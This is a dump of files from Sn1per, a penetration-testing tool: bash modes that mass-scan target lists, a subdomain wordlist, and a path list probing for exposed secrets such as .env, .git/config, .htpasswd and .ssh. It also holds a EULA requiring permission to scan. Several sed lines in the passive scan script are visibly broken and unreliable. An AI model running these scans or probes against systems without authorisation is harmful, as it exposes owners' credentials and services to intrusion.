43 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
44 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
45 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
46 | fi
47 |
48 | if [[ "$LOOT" = "1" ]]; then
49 | loot
50 | fi
51 |
52 | exit
53 | fi
54 |
--------------------------------------------------------------------------------
/wordlists/altdns.txt:
--------------------------------------------------------------------------------
1 | 1
2 | 10
3 | 11
4 | 12
5 | 13
6 | 14
7 | 15
8 | 16
9 | 17
10 | 18
11 | 19
12 | 2
13 | 20
14 | 2009
15 | 2010
16 | 2011
17 | 2012
18 | 2013
19 | 2014
20 | 2015
21 | 2016
22 | 3
23 | 4
24 | 5
25 | 6
26 | 7
27 | 8
28 | 9
29 | a
30 | acc
31 | accept
32 | accounts
33 | adm
34 | admin
35 | admin1
36 | administrator
37 | akali
38 | akamai
39 | alpha
40 | alt
41 | america
42 | analytics
43 | api
44 | api1
45 | api-docs
46 | apollo
47 | april
48 | aws
49 | b
50 | backend
51 | beta
52 | billing
53 | boards
54 | box
55 | brand
56 | brasil
57 | brazil
58 | bucket
59 | bucky
60 | c
61 | cdn
62 | cf
63 | chef
64 | ci
65 | client
66 | cloudfront
67 | cms
68 | cms1
69 | cn
70 | com
71 | confluence
72 | container
73 | control
74 | data
75 | dec
76 | demo
77 | dev
78 | dev1
79 | developer
80 | devops
81 | docker
82 | docs
83 | drop
84 | edge
85 | elasticbeanstalk
86 | elb
87 | email
88 | eng
89 | engima
90 | engine
91 | engineering
92 | eu
93 | europe
94 | europewest
95 | euw
96 | euwe
97 | evelynn
98 | events
99 | feb
100 | fet
101 | firewall
102 | forms
103 | forum
104 | frontpage
105 | fw
106 | games
107 | germany
108 | gh
109 | ghcpi
110 | git
111 | github
112 | global
113 | hkg
114 | hw
115 | hwcdn
116 | i
117 | ids
118 | int
119 | internal
120 | jenkins
121 | jinx
122 | july
123 | june
124 | kor
125 | korea
126 | kr
127 | lan
128 | las
129 | latin
130 | latinamerica
131 | lax
132 | lax1
133 | lb
134 | loadbalancer
135 | login
136 | machine
137 | mail
138 | march
139 | merch
140 | mirror
141 | na
142 | nautilus
143 | net
144 | netherlands
145 | nginx
146 | nl
147 | node
148 | northamerica
149 | nov
150 | oceania
151 | oct
152 | ops
153 | org
154 | origin
155 | page
156 | pantheon
157 | pass
158 | pay
159 | payment
160 | pc
161 | php
162 | pl
163 | poland
164 | preferences
165 | priv
166 | private
167 | prd
168 | prod
169 | production
170 | profile
171 | profiles
172 | promo
173 | promotion
174 | proxy
175 | redirector
176 | region
177 | repo
178 | repository
179 | reset
180 | restrict
181 | restricted
182 | reviews
183 | s
184 | s3
185 | sandbox
186 | search
187 | secure
188 | security
189 | sept
190 | server
191 | service
192 | singed
193 | skins
194 | spring
195 | ssl
196 | staff
197 | stage
198 | stage1
199 | staging
200 | static
201 | support
202 | swagger
203 | system
204 | t
205 | train
206 | training
207 | team
208 | test
209 | test1
210 | testbed
211 | testing
212 | testing1
213 | tomcat
214 | tpe
215 | tr
216 | trial
217 | tur
218 | turk
219 | turkey
220 | twitch
221 | uat
222 | v1
223 | v2
224 | vi
225 | vpn
226 | w3
227 | www
228 | www3
229 | web
230 | web1
231 | webapp
232 | westeurope
233 | z
234 |
--------------------------------------------------------------------------------
/modes/nuke.sh:
--------------------------------------------------------------------------------
1 | # NUKE MODE #####################################################################################################
2 | if [[ "$MODE" = "nuke" ]]; then
3 | if [[ -z "$FILE" ]]; then
4 | logo
5 | echo "You need to specify a list of targets (ie. -f ) to scan."
6 | exit
7 | fi
8 | if [[ "$REPORT" = "1" ]]; then
9 | for a in `cat $FILE`;
10 | do
11 | if [[ ! -z "$WORKSPACE" ]]; then
12 | args="$args -w $WORKSPACE"
13 | WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
14 | echo -e "$OKBLUE[*] Saving loot to $WORKSPACE_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
15 | mkdir -p $WORKSPACE_DIR 2> /dev/null
16 | mkdir $WORKSPACE_DIR/domains 2> /dev/null
17 | mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
18 | mkdir $WORKSPACE_DIR/nmap 2> /dev/null
19 | mkdir $WORKSPACE_DIR/notes 2> /dev/null
20 | mkdir $WORKSPACE_DIR/reports 2> /dev/null
21 | mkdir $WORKSPACE_DIR/output 2> /dev/null
22 | fi
23 | args="$args --noreport --noloot"
24 | TARGET="$a"
25 | args="$args -t $TARGET -b"
26 | echo -e "$OKRED "
27 | echo -e "$OKRED ____"
28 | echo -e "$OKRED __,-~~/~ \`---."
29 | echo -e "$OKRED _/_,---( , )"
30 | echo -e "$OKRED __ / < / ) \___"
31 | echo -e "$OKRED - ------===;;;'====------------------===;;;===----- - -"
32 | echo -e "$OKRED \/ ~'~'~'~'~'~\~'~)~'/"
33 | echo -e "$OKRED (_ ( \ ( > \)"
34 | echo -e "$OKRED \_( _ < >_>'"
35 | echo -e "$OKRED ~ \`-i' ::>|--\""
36 | echo -e "$OKRED I;|.|.|"
37 | echo -e "$OKRED <|i::|i|\`."
38 | echo -e "$OKRED (\` ^''\`-' ')"
39 | echo -e "$OKRED --------------------------------------------------------- $RESET"
40 | echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET"
41 | echo -e "$RESET"
42 | if [[ ! -z "$WORKSPACE_DIR" ]]; then
43 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
44 | sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
45 | else
46 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
47 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
48 | fi
49 | args=""
50 | done
51 | fi
52 |
53 | if [[ "$LOOT" = "1" ]]; then
54 | loot
55 | fi
56 | exit
57 | fi
--------------------------------------------------------------------------------
/wordlists/web-brute-stealth.txt:
--------------------------------------------------------------------------------
1 | $defaultview?Readviewentries
2 | actuator/env
3 | actuator/health
4 | AddressBookJ2WB
5 | AddressBookJ2WE/services/AddressBook
6 | admin
7 | Admin
8 | admin-console
9 | administrator
10 | AlbumCatalogWeb
11 | api
12 | AppManagementStatus
13 | asynchPeople/
14 | .bak
15 | .bashrc
16 | blog
17 | .bzr
18 | CFIDE
19 | CFIDE/administrator/aboutcf.cfm
20 | CFIDE/administrator/enter.cfm
21 | CFIDE/administrator/index.cfm
22 | CFIDE/administrator/welcome.cfm
23 | cgi-bin
24 | clientaccesspolicy.xml
25 | composer.json
26 | computer/
27 | crossdomain.xml
28 | css
29 | .csv
30 | data
31 | deployment-config.json
32 | dispatcher/invalidate.cache
33 | Dockerfile
34 | .DS_Store
35 | elmah.axd
36 | en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
37 | .env
38 | env
39 | errorlog.axd
40 | .ftpconfig
41 | ftpsync.settings
42 | .git
43 | .git/config
44 | .gitignore
45 | global-protect/portal/css/login.css
46 | gulpfile.js
47 | heapdump
48 | .hg
49 | home
50 | host-manager/html
51 | .htaccess
52 | .htaccess.bak
53 | .htpasswd
54 | images
55 | img
56 | index
57 | index.asp
58 | index.aspx
59 | index.htm
60 | index.html
61 | index.jsp
62 | index.php
63 | invoker/EJBInvokerServlet
64 | invoker/JMXInvokerServlet
65 | jmx-console
66 | jmx-console/HtmlAdaptor
67 | js
68 | lbs
69 | Makefile
70 | ;/..;/manager
71 | manager/html
72 | package.json
73 | phpinfo.php
74 | phpmyadmin
75 | phpMyAdmin
76 | phpMyAdmin/scripts/setup.php
77 | portal
78 | portal/info.jsp
79 | pview/
80 | readme.md
81 | readme.txt
82 | register/check/username?username=thisaccountdoesntexist
83 | .remote-sync.json
84 | robots.txt
85 | script
86 | scripts
87 | secure/ManageFilters.jspa
88 | securityRealm/createAccount
89 | server-info
90 | server-manager/html
91 | server-status
92 | sftp-config.json
93 | signup
94 | sitemap.xml
95 | .ssh
96 | status
97 | .svn
98 | systemInfo
99 | test
100 | tomcat/manager/html
101 | trace
102 | Trace.axd
103 | .travis.yml
104 | upload
105 | uploads
106 | user
107 | userContent/
108 | users
109 | view/All/builds
110 | view/All/newjob
111 | .vscode/ftp-sync.json
112 | .vscode/sftp.json
113 | _vti_bin/
114 | _vti_bin/sites.asmx?wsdl
115 | _vti_bin/spsdisco.aspx
116 | _vti_inf.html
117 | _vti_pvt/service.cnf
118 | web.config
119 | web-console
120 | web-console/Invoker
121 | webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/ACreate
122 | webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/com.sap.caf.eu.gp.example.timeoff.wd.create.ACreate
123 | wls-wsat/CoordinatorPortType
124 | wls-wsat/CoordinatorPortType11
125 | wls-wsat/ParticipantPortType
126 | wls-wsat/ParticipantPortType11
127 | wls-wsat/RegistrationPortTypeRPC
128 | wls-wsat/RegistrationPortTypeRPC11
129 | wls-wsat/RegistrationRequesterPortType
130 | wls-wsat/RegistrationRequesterPortType11
131 | wordpress
132 | wp
133 | wp-admin
134 | wp-config.php~
135 | wp-content/plugins/easy-wp-smtp/
136 | wp-content/plugins/easy-wp-smtp/css/style.css
137 | wp-content/plugins/easy-wp-smtp/inc/
138 | wp-content/plugins/easy-wp-smtp/readme.txt
139 | wp-json/wp/v2/users
140 | wp-login.php?action=register
141 | xmlrpc.php
142 |
--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
1 | ## LICENSE:
2 | Sn1per Community Edition End User License Agreement (EULA)
3 |
4 | Sn1perSecurity LLC grants you the right to download, use, and distribute in part or in whole Sn1per Community Edition (also referred to as “Project”, “Code”, “Software”, “Sn1per”, “Product”), provided the following terms and conditions are met:
5 |
6 | (1) You agree to give credit to the original author @xer0dayz and link back to https://sn1persecurity.com (Sn1perSecurity LLC)
7 | (2) You may not rename or rebrand the Project.
8 | (3) You agree not to create any product or service from any par of the Code from this Project, paid or free.
9 | (4) You agree not to re-license the Code.
10 | (5) You may not use the Code for illegal or nefarious purposes, which violates any laws (in your jurisdiction, the jurisdiction in which the Software is running, the jurisdiction in which the Software is targeting, and the United States of America).
11 | (6) You agree not to scan a target in a manner that is considered unlawful, illegal, or that you do not have explicit permission to do so.
12 |
13 | This Software is provided as-is without warranty. Sn1perSecurity LLC, its creators and staff take no liability for consequential damages to the maximum extent permitted by all applicable laws. In no event shall Sn1perSecurity LLC or any person be liable for any consequential, reliance, incidental, special, direct or indirect damages whatsoever (including without limitation, damages for loss of business profits, business interruption, loss of business information, personal injury, or any other loss) arising out of or in connection with the use or inability to use this Product, even if Sn1perSecurity LLC has been advised of the possibility of such damages.
14 |
15 | Sn1perSecurity LLC does not guarantee any functionality or performance of Sn1per Community Edition. Sn1perSecurity LLC does not warrant that the Code will be maintained and in good working order, or that the Software will meet your requirements, be uninterrupted, or error free, or that any errors in the Software will be corrected.
16 |
17 | The Software code, name, and logos are owned by Sn1perSecurity LLC and protected by the United States of America and the state of Arizona copyright and/or patent laws of international treaty provisions. All rights reserved.
18 |
19 | Sn1perSecurity LLC reserves the right to change the licensing terms at any time, without advance notice. Sn1perSecurity LLC reserves the right to terminate your license at any time.
20 |
21 | If any provision of this EULA is determined to be unlawful, void, or unenforceable, such provision shall nonetheless be enforceable to the fullest extent permitted by applicable law, and the unenforceable portion shall be deemed to be severed from this EULA. Such determination shall not affect the validity and enforceability of any remaining provisions.
22 |
23 | Failure of Sn1perSecurity LLC to exercise or enforce any right or provision of this EULA does not constitute a waiver of such right or provision.
24 |
25 | Any ambiguities in the interpretation of this EULA shall not be construed against the drafting party/parties.
26 |
27 | Download, use, distribution (in part or in whole) of this Project/Code constitutes your acceptance of the Sn1per Community Edition EULA. If at any time you are not in agreement or cannot meet any part of this EULA, you should immediately cease use of the Project by removing/uninstalling all copies from all locations.
28 |
29 | For any questions concerning this EULA, please submit a GitHub issue with your question: https://github.com/1N3/Sn1per
30 |
31 |
--------------------------------------------------------------------------------
/modes/massportscan.sh:
--------------------------------------------------------------------------------
1 | # MASSWEB MODE #####################################################################################################
2 | if [[ "$MODE" = "massportscan" ]]; then
3 | if [[ -z "$FILE" ]]; then
4 | logo
5 | echo "You need to specify a list of targets (ie. -f ) to scan."
6 | exit
7 | fi
8 | if [[ "$REPORT" = "1" ]]; then
9 | for a in `cat $FILE`;
10 | do
11 | if [[ ! -z "$WORKSPACE" ]]; then
12 | args="$args -w $WORKSPACE"
13 | WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
14 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
15 | mkdir -p $WORKSPACE_DIR 2> /dev/null
16 | mkdir $WORKSPACE_DIR/domains 2> /dev/null
17 | mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
18 | mkdir $WORKSPACE_DIR/nmap 2> /dev/null
19 | mkdir $WORKSPACE_DIR/notes 2> /dev/null
20 | mkdir $WORKSPACE_DIR/reports 2> /dev/null
21 | mkdir $WORKSPACE_DIR/output 2> /dev/null
22 | fi
23 | args="$args -m fullportonly --noreport --noloot"
24 | TARGET="$a"
25 | args="$args -t $TARGET"
26 | echo -e "$OKRED |"
27 | echo -e "$OKRED | |"
28 | echo -e "$OKRED | -/_\-"
29 | echo -e "$OKRED -/_\- ______________(/ . \)______________"
30 | echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
31 | echo -e "$OKRED <> \___/ <> <>"
32 | echo -e "$OKRED "
33 | echo -e "$OKRED ||"
34 | echo -e "$OKRED <>"
35 | echo -e "$OKRED ||"
36 | echo -e "$OKRED <>"
37 | echo -e "$OKRED ||"
38 | echo -e "$OKRED || BIG"
39 | echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
40 | echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
41 | echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
42 | echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
43 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
44 | echo -e "$OKRED | ||. | | | ||| |||||"
45 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
46 | echo -e "$OKRED | ||. | | | ||| |||||"
47 | echo -e "$OKRED __________________________________________________________"
48 | echo -e "$RESET"
49 | if [[ ! -z "$WORKSPACE_DIR" ]]; then
50 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
51 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
52 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
53 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
54 | fi
55 | sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
56 | else
57 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
58 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
59 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
60 | fi
61 | args=""
62 | done
63 | fi
64 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
65 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
66 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
67 | fi
68 | if [[ "$LOOT" = "1" ]]; then
69 | loot
70 | fi
71 |
72 | exit
73 | fi
74 |
--------------------------------------------------------------------------------
/modes/massweb.sh:
--------------------------------------------------------------------------------
1 | # MASSWEB MODE #####################################################################################################
2 | if [[ "$MODE" = "massweb" ]]; then
3 | if [[ -z "$FILE" ]]; then
4 | logo
5 | echo "You need to specify a list of targets (ie. -f ) to scan."
6 | exit
7 | fi
8 | if [[ "$REPORT" = "1" ]]; then
9 | for a in `cat $FILE`;
10 | do
11 | if [[ ! -z "$WORKSPACE" ]]; then
12 | args="$args -w $WORKSPACE"
13 | WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
14 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
15 | mkdir -p $WORKSPACE_DIR 2> /dev/null
16 | mkdir $WORKSPACE_DIR/domains 2> /dev/null
17 | mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
18 | mkdir $WORKSPACE_DIR/nmap 2> /dev/null
19 | mkdir $WORKSPACE_DIR/notes 2> /dev/null
20 | mkdir $WORKSPACE_DIR/reports 2> /dev/null
21 | mkdir $WORKSPACE_DIR/output 2> /dev/null
22 | fi
23 | args="$args -m web --noreport --noloot"
24 | TARGET="$a"
25 | args="$args -t $TARGET"
26 | echo -e "$OKRED |"
27 | echo -e "$OKRED | |"
28 | echo -e "$OKRED | -/_\-"
29 | echo -e "$OKRED -/_\- ______________(/ . \)______________"
30 | echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
31 | echo -e "$OKRED <> \___/ <> <>"
32 | echo -e "$OKRED "
33 | echo -e "$OKRED ||"
34 | echo -e "$OKRED <>"
35 | echo -e "$OKRED ||"
36 | echo -e "$OKRED <>"
37 | echo -e "$OKRED ||"
38 | echo -e "$OKRED || BIG"
39 | echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
40 | echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
41 | echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
42 | echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
43 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
44 | echo -e "$OKRED | ||. | | | ||| |||||"
45 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
46 | echo -e "$OKRED | ||. | | | ||| |||||"
47 | echo -e "$OKRED __________________________________________________________"
48 | echo -e "$RESET"
49 | if [[ ! -z "$WORKSPACE_DIR" ]]; then
50 | #echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
51 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
52 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
53 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
54 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
55 | fi
56 | sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
57 | else
58 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
59 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
60 | fi
61 | args=""
62 | done
63 | fi
64 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
65 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
66 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
67 | fi
68 | if [[ "$LOOT" = "1" ]]; then
69 | loot
70 | fi
71 |
72 | exit
73 | fi
74 |
--------------------------------------------------------------------------------
/modes/massvulnscan.sh:
--------------------------------------------------------------------------------
1 | # MASSWEB MODE #####################################################################################################
2 | if [[ "$MODE" = "massvulnscan" ]]; then
3 | if [[ -z "$FILE" ]]; then
4 | logo
5 | echo "You need to specify a list of targets (ie. -f ) to scan."
6 | exit
7 | fi
8 | if [[ "$REPORT" = "1" ]]; then
9 | for a in `cat $FILE`;
10 | do
11 | if [[ ! -z "$WORKSPACE" ]]; then
12 | args="$args -w $WORKSPACE"
13 | WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
14 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
15 | mkdir -p $WORKSPACE_DIR 2> /dev/null
16 | mkdir $WORKSPACE_DIR/domains 2> /dev/null
17 | mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
18 | mkdir $WORKSPACE_DIR/nmap 2> /dev/null
19 | mkdir $WORKSPACE_DIR/notes 2> /dev/null
20 | mkdir $WORKSPACE_DIR/reports 2> /dev/null
21 | mkdir $WORKSPACE_DIR/output 2> /dev/null
22 | fi
23 | args="$args -m vulnscan --noreport --noloot"
24 | TARGET="$a"
25 | args="$args -t $TARGET"
26 | echo -e "$OKRED |"
27 | echo -e "$OKRED | |"
28 | echo -e "$OKRED | -/_\-"
29 | echo -e "$OKRED -/_\- ______________(/ . \)______________"
30 | echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
31 | echo -e "$OKRED <> \___/ <> <>"
32 | echo -e "$OKRED "
33 | echo -e "$OKRED ||"
34 | echo -e "$OKRED <>"
35 | echo -e "$OKRED ||"
36 | echo -e "$OKRED <>"
37 | echo -e "$OKRED ||"
38 | echo -e "$OKRED || BIG"
39 | echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
40 | echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
41 | echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
42 | echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
43 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
44 | echo -e "$OKRED | ||. | | | ||| |||||"
45 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
46 | echo -e "$OKRED | ||. | | | ||| |||||"
47 | echo -e "$OKRED __________________________________________________________"
48 | echo -e "$RESET"
49 | if [[ ! -z "$WORKSPACE_DIR" ]]; then
50 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
51 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
52 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
53 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
54 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
55 | fi
56 | sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
57 | else
58 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
59 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
60 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
61 | fi
62 | args=""
63 | done
64 | fi
65 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
66 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
67 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
68 | fi
69 | if [[ "$LOOT" = "1" ]]; then
70 | loot
71 | fi
72 |
73 | exit
74 | fi
75 |
--------------------------------------------------------------------------------
/modes/sc0pe-passive-webscan.sh:
--------------------------------------------------------------------------------
1 | for file in `ls $INSTALL_DIR/templates/passive/web/*.sh 2> /dev/null`; do
2 | source $file
3 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
4 | if [[ "$SEARCH" == "negative" ]]; then
5 | if [[ "$SSL" == "true" ]]; then
6 | if [[ -z "$PORT" ]]; then
7 | PORT="443"
8 | fi
9 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null
10 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
11 | else
12 | if [[ -z "$PORT" ]]; then
13 | PORT="80"
14 | fi
15 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null
16 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
17 | fi
18 | else
19 | if [[ "$SSL" == "true" ]]; then
20 | if [[ -z "$PORT" ]]; then
21 | PORT="443"
22 | fi
23 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null
24 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
25 | else
26 | if [[ -z "$PORT" ]]; then
27 | PORT="80"
28 | fi
29 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null
30 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
31 | fi
32 | fi
33 | rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
34 | done
35 |
36 | for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
37 | source $file
38 | done
39 |
--------------------------------------------------------------------------------
/bin/github-subdomains.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3.5
2 |
3 | # I don't believe in license.
4 | # You can do whatever you want with this program.
5 |
6 | import os
7 | import sys
8 | import re
